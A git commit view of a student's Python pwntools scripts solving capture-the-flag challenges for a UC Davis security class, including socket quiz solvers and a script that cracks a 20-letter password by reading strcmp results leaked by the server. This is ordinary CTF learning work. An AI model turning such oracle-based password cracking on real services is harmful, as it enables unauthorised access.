ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m
git clone git://git.figbert.com/ucdavis-ecs189m.git
Log | Files | Refs
commit b9f756e53c1228b2b58c4b6ed20e69408a2e50ce
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Thu,  3 Oct 2019 10:42:59 -0700

First commit

Diffstat:

Afirst_flag.py | 18++++++++++++++++++


Afunc_dump.py | 47+++++++++++++++++++++++++++++++++++++++++++++++


Asecond_flag.py | 23+++++++++++++++++++++++


Athird_flag.py | 68++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


4 files changed, 156 insertions(+), 0 deletions(-)

diff --git a/first_flag.py b/first_flag.py
@@ -0,0 +1,17 @@
+# A CTF exploit by Benjamin Welner
+# for the Davis Cyber Security Club server
+# at daviscybersec.ddns.net:1337
+# 29/09/2019
+from pwn import *
+
+conn = remote("daviscybersec.ddns.net", 1337)
+for i in range(0,50):
+    eq = conn.recvline_contains("Question")
+    pwnlib.ui.more("Question identified.")
+    eq_solved = bytes("%d"%sum([int(item.strip()) for item in ((eq.split(b":")[1]).strip()).split(b"+")]), "utf-8")
+    pwnlib.ui.more("Equation recieved, solved, and converted to bytestring as %s."%eq_solved)
+    print(conn.recv())
+    conn.sendline(eq_solved)
+    pwnlib.ui.more("Bytestring sent to daviscybersec.ddns.net:1337 using sendline()")
+print(conn.recv())
+conn.interactive()
+\ No newline at end of file
diff --git a/func_dump.py b/func_dump.py
@@ -0,0 +1,46 @@
+from pwn import *
+
+def string_to_decimal(s):
+    lst = [(ord(char)-96) for char in s]
+    for i in lst:
+        lst[i-1] = lst[i-1]*(26**(i-1))
+    added = sum(lst)
+    return added
+
+def increment(password):
+    new_pass = ""
+    lst = []
+    for c in password:
+        lst.append(c)
+    if lst[-1] is not "z":
+        lst[-1] = chr(ord(lst[-1]) + 1)
+    else:
+        lst[-1] = "a"
+        for i in range(2,27):
+            if lst[-1*i] is not "z":
+                lst[-1*i] = chr(ord(lst[-1*i])+1)
+                break
+            else:
+                lst[-1*i] = "a"
+    for i in lst:
+        new_pass += i
+    return new_pass
+
+def decrement(password):
+    new_pass = ""
+    lst = []
+    for c in password:
+        lst.append(c)
+    if lst[-1] is not "a":
+        lst[-1] = chr(ord(lst[-1])-1)
+    else:
+        lst[-1] = "z"
+        for i in range(2,27):
+            if lst[-1*i] is not "a":
+                lst[-1*i] = chr(ord(lst[-1*i])-1)
+                break
+            else:
+                lst[-1*i] = "z"
+    for i in lst:
+        new_pass += i
+    return new_pass
+\ No newline at end of file
diff --git a/second_flag.py b/second_flag.py
@@ -0,0 +1,22 @@
+# A CTF exploit by Benjamin Welner
+# for the Davis Cyber Security Club server
+# at daviscybersec.ddns.net:1338
+# 29/09/2019
+from pwn import *
+import struct
+
+conn = remote("daviscybersec.ddns.net", 1338)
+conn.recvuntil("Ready")
+for i in range(0,50):
+    print(conn.recvuntil("Question"))
+    print(conn.recvuntil(" : "))
+    num_one = struct.unpack("I", conn.recv(4))[0]
+    conn.recvuntil(" + ")
+    num_two = struct.unpack("I", conn.recv(4))[0]
+    print("First number: {}\nSecond number: {}".format(num_one, num_two))
+    num_sum = num_one + num_two
+    print("Sum: {}".format(num_sum))
+    num_sum = struct.pack("I", num_sum)
+    conn.send(num_sum)
+    print("Bytestring sent to daviscybersec.ddns.net:1337 using send()")
+conn.interactive()
+\ No newline at end of file
diff --git a/third_flag.py b/third_flag.py
@@ -0,0 +1,67 @@
+# A CTF exploit by Benjamin Welner
+# for the Davis Cyber Security Club server
+# at twinpeaks.cs.ucdavis.edu:30004
+# 29/09/2019
+#
+# Challenge:
+# I have a password that only has lowercase letters and has length 20.
+# Enter the password to get the flag.
+from pwn import *
+import itertools
+
+def pass_gen(char=None, pos=None, premade=None):
+    password = ""
+    if premade is None:
+        for _ in range(0,20):
+            password += char
+    else:
+        lst = [a for a in premade]
+        for i in range(pos,20):
+            lst[i] = char
+        for item in lst:
+            password += item
+    return password
+
+def find_middle(lst):
+    middle = float(len(lst))/2
+    return int(middle - .5) if middle % 2 != 0 else int(middle)
+
+master_alphabet = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
+current_mid = find_middle(master_alphabet)
+cracked = False
+alphabet = master_alphabet
+passkey = ""
+previous_pass = ""
+start = 0
+
+conn = remote("twinpeaks.cs.ucdavis.edu", 30004)
+print(conn.recv())
+passkey = pass_gen(char=alphabet[current_mid])
+conn.sendline(passkey)
+print("Current letters:\n%s"%alphabet)
+print("Pass sent as:\n%s"%passkey)
+response = conn.recvline_contains(b"strcmp")
+print("Server response:\n%s"%response)
+while not cracked:
+    if b" -1 " in response:
+        alphabet = alphabet[current_mid:]
+        current_mid = find_middle(alphabet)
+        previous_pass = passkey
+        passkey = pass_gen(char=alphabet[current_mid], pos=start, premade=passkey)
+    elif b" 1 " in response:
+        alphabet = alphabet[:current_mid]
+        current_mid = find_middle(alphabet)
+        previous_pass = passkey
+        passkey = pass_gen(char=alphabet[current_mid], pos=start, premade=passkey)
+    else:
+        print("Password cracked as: %s"%passkey)
+        cracked = True
+        conn.interactive()
+    conn.sendline(passkey)
+    print("Current letters:\n%s"%alphabet)
+    print("Pass sent as:\n%s"%passkey)
+    response = conn.recvline_contains(b"strcmp")
+    print("Server response:\n%s"%response)
+    alphabet = master_alphabet[master_alphabet.index(alphabet[0]):]
+    current_mid = find_middle(alphabet)
+    start += 1
+\ No newline at end of file